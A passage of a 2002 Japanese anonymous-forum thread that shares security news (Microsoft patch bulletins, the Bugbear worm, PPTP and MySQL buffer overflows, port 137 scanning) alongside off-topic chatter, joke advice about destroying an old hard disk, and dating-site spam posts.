通知が徹底しておらず、対応に不満の声が上がっている。
[Technology]

以上、WIRED NEWS より。
558名無しさん@お腹いっぱい。:02/09/17 21:49 ID:msjADlZu
ttp://www8.ocn.ne.jp/~dsbfisnp/

OCNは関係ないだろ?
自分のセキュリティの認識の低さを棚に上げて騒いでいるヤシ
こんなの見つけたので晒しあげ
559bloom:02/09/17 21:58 ID:GPt5Z04/
560名無しさん@お腹いっぱい。:02/09/17 22:10 ID:QLVU8mFd
>>558
あれ、疲れる
読ませようと言う気もないみたい(途中で読むの止めたわ)



パスワードがあまりに簡単か、トロイでも仕掛けられてるのやら
561むむむ ◆MUMUMU4w :02/09/19 05:12 ID:13dHFO1k
■セキュリティホールをスキャンするソフト、ISS Scannerにセキュリティホール

リモートからバッファオーバーフローさせられるセキュリティホールがあった模様。
対象はNT/2000/XP版。
既にパッチがISSからリリースされているので、それを適用すること。

情報元: http://www.foundstone.com/knowledge/randd-advisories-display.html?id=336 (英語)
製品紹介(LAC): http://www.lac.co.jp/security/software/iss/is/index.html
562むむむ ◆MUMUMU4w :02/09/19 05:14 ID:13dHFO1k
>>561
ISSからも情報出た。

Internet Security Systems Security Alert
September 18, 2002
Flaw in Internet Scanner Parsing Mechanism
http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21165
563b:02/09/19 05:33 ID:3nzDo92a
564名無しさん@お腹いっぱい。:02/09/19 09:56 ID:???
565名無しさん@お腹いっぱい。:02/09/19 10:37 ID:???
何でこのスレは Windows 板にないのさ?
566名無しさん@お腹いっぱい。:02/09/19 10:37 ID:???
ぼぶ ◆EMrmvKLI [] 投稿日:02/09/10 19:18 ID:G4zqfa38
これはいろんなとこにコピペしてください。
みんなで台風を起こしましょう。
東京駅を中心に右回りです。
9月22日夜9時にみんなでいっせいに「フゥー」と吹くのです。
注意
周りに障害物のないところでやりましょう(なるべく高いところ)
「フゥー」以外に扇風機やうちわを使ってもかまいません。
       !東京を壊しましょう!
567むむむ ◆MUMUMU4w :02/09/19 11:35 ID:???
>>564
いよいよ「表向きにも」配布始まりましたか。

>>565
とりあえず「速報」という趣旨でここに立てたです。
568むむむ ◆MUMUMU4w :02/09/19 11:37 ID:YPaVnxFQ
>>475 >>557
ポリコム社の見解: http://www.polycom.co.jp/news

しかし、某MLの高木さんは相変わらず手厳しいなと。
569名無しさん@お腹いっぱい。:02/09/19 13:28 ID:woq2ngZ5
570むむむ ◆MUMUMU4w :02/09/19 15:00 ID:???
>>569
こっちも出ましたね。なお、WinXPをSP1にするとIEもSP1になる模様。
571むむむ ◆MUMUMU4w :02/09/19 15:16 ID:UO2J2exJ
■Windows2000/XPにリモートからの攻撃が可能なセキュリティホール、情報の漏洩も(MS02-051)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-051ov.asp

MS02-051 に関する情報
「MS02-051: RDP プロトコルの暗号の問題により、
情報が漏えいされる (Q324380)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品の RDP に関する脆弱性により、
悪意のあるユーザーにサービスの停止や情報の取得を行われる
可能性があります。

対象となる製品
==============
・ Microsoft Windows 2000
・ Microsoft Windows XP

(続く)
572むむむ ◆MUMUMU4w :02/09/19 15:16 ID:UO2J2exJ
>>571 続き

修正プログラム
==============
・ Microsoft Windows 2000
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q324380/NT5/JA/Q324380_W2K_SP4_X86_JA.exe
・ NEC PC-9800シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q324380/NT5/JA/Q324380_W2K_SP4_nec98_JA.exe
この修正プログラムは Windows 2000 SP2、または Windows 2000 SP3 の
環境にインストールすることができます。
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q324380/WXP/JA/Q324380_WXP_SP1_x86_JPN.exe
この修正プログラムは、 Windows XP Service Pack 1 に含まれています。
・ Microsoft Windows XP 64 bit Edition
http://download.microsoft.com/download/whistler/Patch/Q324380/W64XP/JA/Q324380_WXP_SP1_ia64_JPN.exe
この修正プログラムは、 Windows XP Service Pack 1 に含まれています。
573むむむ ◆MUMUMU4w :02/09/19 15:18 ID:UO2J2exJ
■Microsoft Java VMにこれまでとは別のセキュリティホール(MS02-052)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-052ov.asp

MS02-052 に関する情報
「MS02-052: Microsoft VM JDBC クラスの問題により、コードが実行される
(Q329077)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品の JDBC/ODBC クラスに関する 3 つの脆弱性
により、不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによりお客様のコンピュータ上で任意のプログラムを実行
される可能性があります。

対象となる製品
==============
・Microsoft Virtual Machine for Internet Explorer (Microsoft VM)
 ビルド 3805 を含む、それ以前のビルド全て

注意: Microsoft VM は Windows や Internet Explorer の一部として出荷
されているほかに、Windows Update や Web サイトから新しいバージョンを
ダウンロードすることもできます。また、Microsoft VM は多くの
アプリケーションの一部としても出荷されています。そのため、必ずビルド
番号を確認してください。

(続く)
574むむむ ◆MUMUMU4w :02/09/19 15:19 ID:UO2J2exJ
>>573 続き
Microsoft VM の ビルド番号の確認方法は、以下の2つの方法があります。

・JVIEW コマンドを使用する
1. コマンド プロンプトを起動します。
 ・Windows 98/98SE/Me
[スタート] - [ファイル名を指定して実行]を選択し、 command と入力し [OK]
をクリックします。
 ・Windows NT/2000/XP
[スタート] - [ファイル名を指定して実行]を選択し、 cmd と入力し[OK]を
クリックします。
2. jview を実行します。
3. 実行すると、Version が表示されます。
・MSJAVA.DLL ファイルのバージョンから Microsoft VM のバージョンを
確認する
Internet Explorer 4.01 SP1 の環境においては、JVIEW コマンドを使用して
確認したバージョン情報と MSJAVA.DLL のバージョンが異なります。正しい
Microsoft VM のバージョンは、MSJAVA.DLL のバージョンです。

1. [スタート] ボタンをクリックし、[検索] - [ファイルやフォルダ] を
クリックします。
2. [名前] ボックスに MSJAVA.DLL と入力し、[探す場所] ボックスで OS が
インストールされているドライブを指定して、[検索開始] ボタンを押します。
3. 検索結果として表示された MSJAVA.DLL ファイルをマウスの右ボタンで
クリックし、表示されたメニューから [プロパティ] をクリックします。
4. [バージョン情報] のタブを開き、ファイル バージョンを確認します。
ファイル バージョンの数字の最後の 4 桁が、Microsoft VM の
ビルド番号です。

(続く)
575むむむ ◆MUMUMU4w :02/09/19 15:19 ID:UO2J2exJ
>>574 続き

修正プログラム
==============
この問題に対する修正プログラムは Windows Update からインストール
してください。
・Windows Update
http://windowsupdate.microsoft.com

注意:上記の修正プログラムをインストールするためには Microsoft VM
(ビルド 3805) がインストールされている必要があります。Microsoft VM
(ビルド 3805) は Windows Update の「重要な更新と Service Pack」 の
「セキュリティ問題の修正プログラム - 2002 年 3月 4 日 -
(投稿した日付: July 10, 2002)」 を選択しインストールしてください。
Windows XP をお使いのお客様は、Windows Update カタログ からの入手、
または、Service Pack 1 をインストールすることによって、Microsoft VM
(ビルド 3805) を適用することができます。

Windows Update の使い方については、次のサイトを参照ください。
http://www.microsoft.com/japan/security/square/guard/a04g1.asp
576むむむ ◆MUMUMU4w :02/09/19 15:20 ID:UO2J2exJ
補足。

>>575 には WinXP SP1 を入れれば問題ない、という記述がありますが、
今 Windows Update したところ「入れなさい」と表示されました。
577むむむ ◆MUMUMU4w :02/09/19 15:23 ID:???
>>576
というかよく読むと「(WinXP SP1にすることで)ビルド3805にしてから、Windows Update
しなさい」ということか。ううむ。
578名無しさん@お腹いっぱい。:02/09/19 17:26 ID:???
>>577
いつもご苦労様です。m(_ _)m
これからもよろしくお願いします。
579むむむ ◆MUMUMU4w :02/09/19 18:15 ID:???
今回の MS02-052 はどうやら >>521 の修正みたいですが、全部が解決したのかは
まだ明らかではない模様。

>>578
どうも。今日は超忙しくてN+の方のスレ立ては無理ぽなので、
ここだけしかメンテできそうもない、、、。
580名無しさん@お腹いっぱい。:02/09/19 18:34 ID:???
そもそもMicrosoft VMを使うべきじゃないんじゃないですかねぇ・・・
581名無しさん@お腹いっぱい。:02/09/19 20:09 ID:???
>>580
でもタブブラウザ使ってるとSunのJAVA使えなくない?
582名無しさん@お腹いっぱい。:02/09/19 20:24 ID:???
>>581
そうなの?
583むむむ ◆MUMUMU4w :02/09/19 20:45 ID:???
>>581
そうですね。IEエンジンのタブブラウザ(例えばSleipnir)とかでは
デフォルトではSunのJava plug-inは使われないようです。
Java plug-inを入れた状態で例えばここ↓のページ見て、タスクトレイに
例のコーヒーカップが表示されない場合、Sunのプラグインは使われていません。
584むむむ ◆MUMUMU4w :02/09/19 20:50 ID:UO2J2exJ
585むむむ ◆MUMUMU4w :02/09/19 20:55 ID:???
>>583
ていうか、OperaではSunのが動いてもコーヒーカップは表示されないので、
あまり正確ではないですね。

とりあえず、このURLの時計を見たときに、文字盤の数字が太めのゴシックっぽい
字で表示されるのがSunのが動いたときで、細めの字が表示された時はMSの
もののようです。
(Windows XP SP1の場合)

あと、アプレットのロードに時間がかかって、すぐに表示されない方がSunのだと
いう話もあります(w。
586名無しさん@お腹いっぱい。:02/09/19 22:59 ID:yJmbx4ZX
WinMEでMS02-052入れたら再起動しますかと聞かれ はいを押したらブルースクリーンになってしまった。前にもこんなことがあった気が。インストールはされたようだが。
587名無しさん@お腹いっぱい。:02/09/19 23:17 ID:???
>>581-585
他スレでも書いたがもう一度書いておくと、
Javaの起動が遅かったりタスクトレイにコーヒーカップアイコンが
出たりするのが嫌な場合、コントロール パネルのJava Plug-inを開き、
基本タブで「コンソールを開始しない」に設定すればまとめて改善される。
(ただし、SunのJavaのバージョンが1.4.0以降で有効。)
遅いのはコンソール起動に時間がかかっているから。
起動しなくてもJavaは動くし、タスクトレイアイコンはコンソールの
機能なのでコンソールを開始しなければ出ない。
(「Java アイコンをシステムトレイに表示」のチェックは
コンソールを開始した際の設定なので、上の設定をした場合は
チェックはそのままでも構わない。)

IEとそのコンポーネント利用系ブラウザでSunのJavaを使うには、
インターネット オプションの詳細設定タブでMicrosoft VMのチェックを
全部外し、その上にあるJava (Sun)の項目をチェックすれば良いと思う。
588名無しさん@お腹いっぱい。:02/09/20 03:15 ID:???
>>587
> インターネット オプションの詳細設定タブでMicrosoft VMのチェックを
> 全部外し、その上にあるJava (Sun)の項目をチェックすれば良いと思う。

いや。IEコンポ系(当方プニル)の場合、この通りやってもSun Javaは
起動しないんだ。IE本体ならちゃんと起動するんだけどね。
589587:02/09/20 06:45 ID:???
>>588
私の勘違いだったみたい…ごめんなさい。
確かにコンポーネントブラウザだと駄目みたい(当方Moon。)。

>>587の訂正。申し訳ない…。
タスクトレイアイコンを消したいなら
「コンソールを開始しない」にしただけでは駄目。
「Java アイコンをシステムトレイに表示」をオフにする必要がある。

やってしもうた…。
590名無しさん@お腹いっぱい。:02/09/20 17:56 ID:???
おじーちゃんの時計
ttp://www.hut.fi/~mnippula/clock.html
591名無しさん@お腹いっぱい。:02/09/20 21:04 ID:vndHca8U
米MicrosoftのJavaセキュリティーホール修正は不十分と発見者が指摘
http://www.watch.impress.co.jp/internet/www/article/2002/0920/msjava.htm
> Microsoftが19日に発表した修正パッチの説明によれば、この修正パッチでは
> Javaデータベース接続(JDBC)クラスに関連して3つのセキュリティーホールが
> 存在することを認め、これを修正した。しかしOnline SolutionsがもともとMicrosoftの
> JavaVMに存在するとしたセキュリティーホールは10以上で、いずれもMicrosoftに
> 報告されていると説明している。しかもMicrosoftが修正していないこれら
> セキュリティーホールの中には、任意のコードが実行できるものなど深刻なバグが
> 含まれており、かなりの危険性があるという。
592名無しさん@お腹いっぱい。:02/09/20 21:50 ID:gA/keD98
怒涛のバグラッシュだな
>>591
情報どうも。
やはりそんなことだろうと思ってました、、、。

>>587
Javaアイコンをタスクトレイ表示するのをやめ、コンソールを開始しないに
設定したら、だいぶ起動が速くなりました。
MSのに比べれば、そりゃまあ確かに少し時間かかりますが。
ちなみにタブブラウザ(Sleipnir)では >>588-589 の通り、だめなようですね。
594名無しさん@お腹いっぱい。:02/09/21 18:22 ID:???
AQEG6BB
AQGM2B4
595名無しさん@お腹いっぱい。:02/09/23 12:48 ID:???
保全
596名無しさん@お腹いっぱい。:02/09/24 23:05 ID:MLtStLvJ
あげ
597名無しさん@お腹いっぱい。:02/09/25 10:36 ID:???
平和なんでセキュリティ知識をつけるのに便利なリンク集〜。

IPAセキュリティセンター(不正アクセスの被害届やセキュリティ用語集)
http://www.ipa.go.jp/security/

advICE(IDSソフト、BlackICE Defenderの東陽テクニカ内にある
セキュリティ情報データベース。上で調べた用語をさらに突っ込んで
調べたい時ここを見てる)
http://www.toyo.co.jp/security/ice/advice/

PTRS(penetration technique research site アプリケーション
の脆弱性の調査、実験。>>350のOperaやMozillaのFTPを利用した
脆弱性もここで知りました)
http://www.geocities.co.jp/SiliconValley/1667/index.htm

IT Pro(セキュリティ関連記事多し。記事の多くは読むのに無料の会員登録が
必要)
http://itpro.nikkeibp.co.jp/
598むむむ ◆MUMUMU4w :02/09/25 11:30 ID:???
>>597
どうもです。では、私の情報源をいくつか。主にメーリングリスト系を。

・MSのメーリングリスト
・BugTraq-JP
・セキュリティmemo
・port139
・VulnWatch
・Scan Tech Report (有料)
・トレンドマイクロ ウイルス情報
・NetSecurity (http://www.netsecurity.ne.jp/)

あと、同僚にその筋の情報に詳しい人間がいるので、
本家BugTraqやSecuriTeamのMLからの情報収集は、そいつに頼ってます。
599名無しさん@お腹いっぱい。:02/09/25 13:31 ID:u0noJaqw
質問させて下さい!!
W2K Server +
Apache +
Tomcat
の構成でインターネットからの接続が可能な
Webサーバを立てているのですが、
マイクロソフトから出ている、IEのセキュリティパッチは
当てた方が良いのでしょうか?IISは当然動いていません。
後、IEのバージョンもW2Kの初期バージョンです。
IEのバージョンも上げた方が良いのでしょうか?
他のセキュリティパッチは当然当てています。
宜しくお願い致します。
600名無しさん@お腹いっぱい。:02/09/25 13:49 ID:uOjty0Hj
601名無しさん@お腹いっぱい。:02/09/25 14:55 ID:???
>>599
ここは質問スレッドではありません
602名無しさん@お腹いっぱい。:02/09/25 14:56 ID:???
>>599
とりあえずW2KSP3を今の環境の上からでいいからあてろ
603:02/09/25 15:03 ID:sthjvfPu
日本テレビの番組サイトに侵入書き換える
dailynews.yahoo.co.jp/fc/computer/security_and_encryption/
HPって簡単に書き換えられるの?
604yahooo!!アダルト:02/09/25 15:05 ID:7D9aZjVp
60595なの:02/09/25 16:51 ID:A+LBZEYg
もらったPCが、とうとう立ち上がらなくなりました。
95なので、クラスタスキャンに時間がかかり、いつも途中で強制終了させてネットをやってました。
その強制終了も出来なくなり、ゲートウエイでよく分かんないし、直せる当てもないのです。

廃棄にするしかないと思いますが、お気に入りに入っているものを、どうやって消したら良いんでしょうか?
IDとかパスワードもあるんです。
606名無しさん@お腹いっぱい。:02/09/25 17:01 ID:???
>>605
HDDを物理的に破壊。
コナゴナにしろ。
607名無しさん@お腹いっぱい。:02/09/25 17:05 ID:???
>>605
窓から放り投げる ぽいって
608名無しさん@お腹いっぱい。:02/09/25 17:51 ID:???
>>605
燃やしちゃえ、家ごと。
色々諸々みんなまとめて消せるから。
609名無しさん@お腹いっぱい。:02/09/25 22:05 ID:???
>>605
おれにくれ 着払いでいいから
610ブッシュはヒトラー以下:02/09/26 01:16 ID:???
ウイルス駆除ソフト大手サイトで個人情報を誤表示

 コンピューターウイルス駆除ソフト「ウイルスバスター」などで知られる
 トレンドマイクロ(東京都)のインターネットサイトで、利用者がユーザー
 登録を更新する際、他人の名前やメールアドレスなど少なくとも10人分の
 個人情報が誤まって表示されていたことが25日、わかった。
 誤表示されたのは本人確認用の情報で、同社はユーザー登録更新手続きのた
 め、このサイトを8月28日に開設したが、同社の説明によると、今回のト
 ラブルは、更新手続きのアクセスが集中したためシステムが正常に稼働しな
 かったのが原因とみられる。
 利用者から「他人の情報が出ている」と指摘があった今月4日、サイトを閉
 鎖したが、この間、サイトにアクセスした利用者は約2万3000人に上る
 という。 (9月26日00:38ヨミウリ)
-------------
げんいんは、ういるすによるものとおもわれる。
611名無しさん@お腹いっぱい。:02/09/26 03:58 ID:???
>>605
ハードディスクをBios画面からLowレベルフォーマットかけてみれば?
612ぼるじょあ ◆EncckFOU :02/09/26 14:16 ID:???
MS02-053: Smart HTML インタープリタでバッファオーバーランに
よりコードが実行される (Q324096)のパッチがりりーすされました。

Microsoft FrontPage Server Extensions 2000
Microsoft FrontPage Server Extensions 2002
Microsoft Windows 2000 (FrontPage Server Extensions 2000 を含みます)
Microsoft Windows XP Professional Edition
(FrontPage Server Extensions 2000 を含みます)

Smart HTML インタープリタの脆弱性により、
サービス拒否攻撃を行われる可能性がありるそうです。


http://www.microsoft.com/japan/technet/security/bulletin/MS02-
053ov.asp?frame=true
613いつも名無し ◆sageram2 :02/09/26 15:22 ID:???
>>605 レンジでチン(一瞬でOKかと思われ)
614名無しさん@お腹いっぱい。:02/09/26 16:24 ID:???
>>613
電子レンジは壊れないの?
615名無しさん@お腹いっぱい。:02/09/26 20:04 ID:???
>>605
ハードディスク外して持っとけば?
616名無しさん@お腹いっぱい。:02/09/26 23:03 ID:???
>>614
壊れません。ただ長い時間やると火ぃ吹いてレンジの内装傷む鴨。
617名無しさん@お腹いっぱい。:02/09/27 00:54 ID:???
壊れはしないが派手な火花が
618605:02/09/27 11:07 ID:mHoiv/qj
皆さん有り難うございます。

95で満足できる消防なので、教えていただきたいのですが、
やはり、直る見込みは無いのですよね・・・。

>>611さんのやり方が良く分かんないので(PCウブなので)、
週末にでも量販店で状況他聞いてきます。

それから、HDDって買い替えができるものですか???
2000とか入れられるのでしょうか?????
CドライブやHDD壊したら、残り物はそれぞれ部品としてしか使えないのでしょうか?
・・・・スレ違いですよね・・・・すいません。量販店炒ってきます。
619名無しさん@お腹いっぱい。:02/09/27 11:48 ID:???
量販店でLowレベルフォーマットのやり方聞くって、店員ひっくり返るぞ。
620605:02/09/27 13:01 ID:RCO6eazJ
>>619さん
どうして???禁じ手なのですか????
量販店にとって、都合が悪いのですか?
621名無しさん@お腹いっぱい。:02/09/27 13:23 ID:???
>>620
量販店の店員が知ってるとは思えん。
奴らは只のセールスマンだから。
622名無しさん@お腹いっぱい。:02/09/27 13:26 ID:???
>>620
量販店の人間なんて大して知識ないでしょ。
それに、BIOSなんてマザーボードによって結構違うんだから聞かれても困る。
あと、HDDは交換できるし、OSも入れ替えられる。
623605:02/09/27 14:07 ID:mHoiv/qj
ふ〜ん。PCに強い人は、店員になるより他の仕事に就くってことか・・・

>>622さん有り難う!HDD、OSを買い揃えることで決定!!! o(^-^)o
HDDは何とかして破壊します!ガスコンロであぶるってダメかなあ?
624名無しさん@お腹いっぱい。:02/09/27 14:23 ID:???
>>623
> >>622さん有り難う!HDD、OSを買い揃えることで決定!!! o(^-^)o
> HDDは何とかして破壊します!ガスコンロであぶるってダメかなあ?
いやだからさ、外してそのまま自分で持ってればいいじゃん。
HDD自体をばらして中見てみるとか。
625605:02/09/27 15:02 ID:P/pTZKa5
活用できなくなったHDDはもうゴミでしょ?ゴミは捨てたいのですが・・。

>HDD自体をばらして中見てみるとか。
!!☆◎●□Ωζ§♪!!!?????????  ・・・どう言うことかが分かりましぇん・・。
やはり、もっと勉強して出直してきます。(-_-;)




626名無しさん@お腹いっぱい。:02/09/27 15:38 ID:???
>>625
秘密がバレるのが嫌なら保管しとくのが良いかなと。
> >HDD自体をばらして中見てみるとか。
> !!☆◎●□Ωζ§♪!!!?????????  ・・・どう言うことかが分かりましぇん・・。
> やはり、もっと勉強して出直してきます。(-_-;)
文字通りドライブを分解して中の構造を見てみることですが。
ハードディスクの中身がどうなってるか興味ない?

PCの中いじるのが嫌なら、SCSI外付にしても良いかもね。
ボード買わなきゃいけないけど。
627名無しさん@お腹いっぱい。:02/09/27 16:32 ID:???
>>626
どのみち開けてカード挿さなきゃいけないか・・・
628名無しさん@お腹いっぱい。:02/09/27 16:41 ID:???
漏れ4機くらいHDの中身を見たことあるなあ…
629名無しさん@お腹いっぱい。:02/09/27 16:52 ID:???
スレ違いも甚だしい
630名無しさん@お腹いっぱい。:02/09/27 16:55 ID:???
米MS,米オラクルなど,インターネットの脆弱性問題に対処する業界団体を結成
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20020927/4/
631ぼるじょあ ◆EncckFOU :02/09/27 20:01 ID:???
(・3・) アレなんか急にダメスレになってない?
632名無しさん@お腹いっぱい。:02/09/27 20:05 ID:???
いいことなんだけど、ネタが無くてさぁ・・・
633名無しさん@お腹いっぱい。:02/09/27 21:05 ID:???
パッチ当てたいよ症候群
634名無しさん@お腹いっぱい。:02/09/27 21:14 ID:???
>>633
同意。
635名無しさん@お腹いっぱい。:02/09/27 21:37 ID:???
<10・11月 ターダーのセキュリティー関係のイベント>

SecureXchange2002
2002年11月6日(水)〜7日(木)
http://sav.gweb.ne.jp/index.html

ネットワークセキュリティーセミナー
2002年10月23日〜11月6日
http://www.toplayer.co.jp/event_netsec2.html

セキュリティ・スタジアム2002
2002年10月16日(水)〜19日(土)10:00〜18:00
http://www.security-stadium.org/
636ぼるじょあ ◆EncckFOU :02/09/27 21:40 ID:???
>>612にリンク春サイにミスってるからもう一度書き込んどくNE (・3・)

Smart HTML インタープリタでバッファオーバーランに
よりコードが実行される (Q324096) (MS02-053)


http://www.microsoft.com/japan/technet/security/bulletin/MS02-053.asp?frame=true
637名無しさん@お腹いっぱい。:02/09/27 22:48 ID:???
>>633
家のマシン、Win2kSP3を当てると起動しなくなるんだよ (つД`)
638名無しさん@お腹いっぱい。:02/09/27 22:57 ID:H5odsm4z
マイクロソフトのVPNに脆弱性?
http://japan.cnet.com/Enterprise/News/2002/Item/020927-2.html
639597:02/09/28 18:35 ID:???
>>598
なるほど、完璧ですね。セキュリティ系のMLは入って
なかったんで1つぐらい入ってみようかな。

>>636
これって今までにIISやFPSE入れてなきゃ問題ないってことで
いいんですよね?
640むむむ ◆MUMUMU4w :02/09/29 03:29 ID:???
木曜から土曜までここに来れなかった間にMS02-053がリリースされましたね。
>>612 の通りです。これは危険度「高」なので、特に2000/XP Proの人は速攻で
インストールを。

あとは >>638 の情報ぐらいかな。セキュリティ関連ではRC5-64の解読あたりも
ニュースかも。
641むむむ ◆MUMUMU4w :02/09/29 03:52 ID:GSduBvxC
>>612 にあった MS02-053 ですが、WinXP は SP1 に含まれているようですね。
Win2000 の SP3 には含まれてないみたいなので、別途パッチを入手しましょう。

--- 以下引用
Windows 2000 の Microsoft FrontPage Server Extensions 2000 :

PC/AT 互換機用
http://www.microsoft.com/downloads/release.asp?ReleaseID=42959
ダウンロード先のリストから Japanese を選択してください。

NEC PC-9800 シリーズ用
http://www.microsoft.com/downloads/release.asp?ReleaseID=42960
ダウンロード先のリストから Japanese NEC を選択してください。

http://windowsupdate.microsoft.com/ からも入手可能です。
642ぼるじょあ ◆EncckFOU :02/09/30 20:18 ID:???
「Windows 2000/XP」のPPTPにバッファーオーバーフローの脆弱性〜独企業が警告
http://www.watch.impress.co.jp/internet/www/article/2002/0930/pptp.htm

>ハッカーがこの脆弱性を悪用し、細工を施したPPTPパケットを送って、
>サーバーのカーネルのメモリーを書き換えることが可能になるという。
>Phionは、このような攻撃によって、Windows 2000 SP3とWindows XPを
>搭載したマシンが機能停止に陥ることを確認したとしている。

 さらに、PPTPサービスでは、あらゆるインターフェイスで1723番の
ポートを常にチェックしているため、クライアント側も脆弱性になり、
特にPPTPを使って接続しているDSLユーザーは危険性が高いと警告している。

(・3・) ガクガク ブルブル
643むむむ ◆MUMUMU4w :02/09/30 22:32 ID:l3g3eeIY
>>642
どうもです。>>638 の詳報ですね。今日いくつかのソースで出てました。
対策が必要な雰囲気ですね。
644名無しさん@お腹いっぱい。:02/10/01 00:56 ID:IPOJuHlh
>>612ってさ、
XP/2000でなおかつM$の特定のWeb鯖サービスを動かしてなければ関係なし?
http://www.microsoft.com/japan/technet/security/bulletin/MS02-053.asp?frame=true
には
>この問題は FrontPage Server Extensions の 2 つのバージョンに異なる影響を及ぼします。
って書いてあるんだけど。
645名無しさん@お腹いっぱい。:02/10/01 15:07 ID:RSw9PLMt
パスワードなどを盗む新型ワーム「Bugbear」

> Bugbearはトロイの木馬付きのインターネットワームで、
> パスワードやクレジ> ットカード情報を盗もうとする。
> 50,688バイトの添付ファイル付き電子メール(サブジェクト
> は既存の電子メールから取ってくる場合がある)、もしくは
> ネットワークファイル共有を介して届く。不正MIMEヘッダの
> 問題を解消するパッチ(MS01-020)を適用していないInternet Explorer 5.0
> 1/5.5を利用するユーザーに感染のおそれがある。IE 6のユーザーは
> 安全。このワームのファイル共有ネットワーク経由での
> 感染能力に対しては、Windowsの全バージョンが脆弱。

http://www.zdnet.co.jp/news/0210/01/nebt_16.html

今日、突然ノートンが更新されてたのはこれだったのか。

>>644
WINDOWSディレクトリ内にshtml.dllってファイルある?
なければ大丈夫だと思うんだが。オレはそのパッチはパスした。
なんでも入れれば良いってもんじゃないしね。システム不安定
になるかもしれんし。

ただ鯖立てて無くてもWin2kSP2だったら入ってると思うから、パッチ当てといた
方がいいんじゃない。
646645:02/10/01 15:20 ID:RSw9PLMt
W32/Bugbear@MMの補足

symantec(英語)
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
日本のsymantecではまだ更新されて無い様子。

McAfee(日本語)
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Bugbear@MM
647ぼるじょあ ◆EncckFOU :02/10/01 15:33 ID:???
>>645

(・3・) このサイトが日本語で詳しく説明してる気がするYO

F-Secure ウイルス情報
http://www.f-secure.co.jp/v-descs/v-descs3/tanatos.htm
648名無しさん@お腹いっぱい。:02/10/01 19:16 ID:YF3z8zZr
Bugbear に関する情報
公開日 : 2002 年 10 月 1 日
http://www.microsoft.com/japan/technet/security/virus/bugbear.asp?frame=true

これは新しくパッチが公開されたわけじゃないよねぇ?
649名無しさん@お腹いっぱい。:02/10/02 09:01 ID:hXM1aFqN
Windows XP の 「ヘルプとサポート センター」 の脆弱性に関する情報(9/30)
http://www.microsoft.com/japan/technet/security/topics/hcp1.asp?frame=true
650 @:02/10/02 12:58 ID:27spK1MR
■■ 出会いサイト開業システムレンタル ■■

儲かる出会い系ビジネス

月収100万円オーバー!!

HP作成できない初心者でも安心して運営

出会いサイトシステムをサーバーごとレンタルします

運営者様には無料で宣伝ソフトもお付けします


http://pink7.net/open/linkstaff.html



@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@
651むむむ ◆MUMUMU4w :02/10/02 13:48 ID:???
>>649
一瞬、「ヘルプとサポート センター」に脆弱性が発見されたのかと思ったです(w。
652;lk:02/10/02 15:58 ID:27spK1MR
■■ 出会いサイト開業システムレンタル ■■

儲かる出会い系ビジネス

月収100万円オーバー!!

HP作成できない初心者でも安心して運営

出会いサイトシステムをサーバーごとレンタルします

運営者様には無料で宣伝ソフトもお付けします


http://pink7.net/linkstaff/cgi/click.cgi?id=10001









@
653むむむ ◆MUMUMU4w :02/10/02 19:19 ID:TSsbFJdl
■ポート137へのスキャンが急増

 アイ・ディフェンス・ジャパンからの情報によると、2002年9月28日以来、TCP/UDP
ポート137のスキャン数が増加し続けている。Internet Storm Centerからの情報に
よると、68,725もの個別ホストから284,693ターゲットがスキャンされたという。これは、
同ポートで通常見られるスキャン数をはるかに上回るものだ。ポート137はNetBIOS
通信として知られており、Windowsはこのポートを使って接続されている
各コンピューターのWindows名を取得している。送信されたパケットは、報告によると
偽造されたnetbiosネームサービス(ns)ルックアップだという。
(以下略)
(以上、2002年10月2日のYahoo!ニュースより一部引用―全文は引用元を参照)

引用元: http://headlines.yahoo.co.jp/hl?a=20021002-00000012-vgb-sci
654名無しさん@お腹いっぱい。:02/10/02 20:18 ID:x/M1lCL+
>>653
それ何回もあって、うざがってたんですが、そうだったのですか。犯人が分かったら掲載お願いしますね。
655むむむ ◆MUMUMU4w :02/10/03 03:04 ID:qMy102aP
■MySQL v3.23.49-ntにバッファオーバーフローの脆弱性

Win32で確認したとのこと。他のプラットフォームもまずいかも。
>Fixed in the 3.23.50 release of MySQL and MySQL 4.0.2
ということなので、パッチを適用すればよい模様。

情報元: http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0004.html
656むむむ ◆dFMUMUMU4w :02/10/03 11:17 ID:nqkgKhGB
今朝、いきなりWindowsupdateにこんなのが掲載されてた。
元ネタはこれらしい。

Windows XP Documentation Update Can Help You Understand
How to Make Your Computer More Secure
http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q327405& (英語)

--- cut ---
Q327405 : 推奨される更新 (Windows XP Professional)

この更新は、セキュリティとプライバシーに関する新しい情報です。今すぐダウン
ロードして、個人情報を保護するための手順と、コンピュータのセキュリティをより
高める方法について確認してください。

この問題の詳細については、Microsoft Knowledge Base の Q327405 を参照して
ください。なお、このページの情報は英語で説明されています。

必要システム

この更新は、Service Pack 1 (以下 SP1) を適用した Windows XP Professional に
対して適用されます。

実行するには

コンピュータを再起動してインストールを完了します。次に、[スタート] メニューの
[ヘルプとサポート] をクリックして、[ヘルプ トピックを選びます] の [セキュリティと
プライバシー] をクリックします。
657むむむ ◆dFMUMUMU4w :02/10/03 11:26 ID:nqkgKhGB
もう一つあった。こっちは「重要な更新」。
Technetには情報がないように見える、、、。

--- cut ---
Q323255 : セキュリティ問題の修正プログラム

この修正プログラムによって、Windows XP に存在する「HTML ヘルプの未チェックの
バッファによりコードが実行される可能性がある」という脆弱性が修正されます。
今すぐダウンロードして、お使いのコンピュータ上で悪意のあるユーザーが不正な
プログラムを実行できないようにしてください。

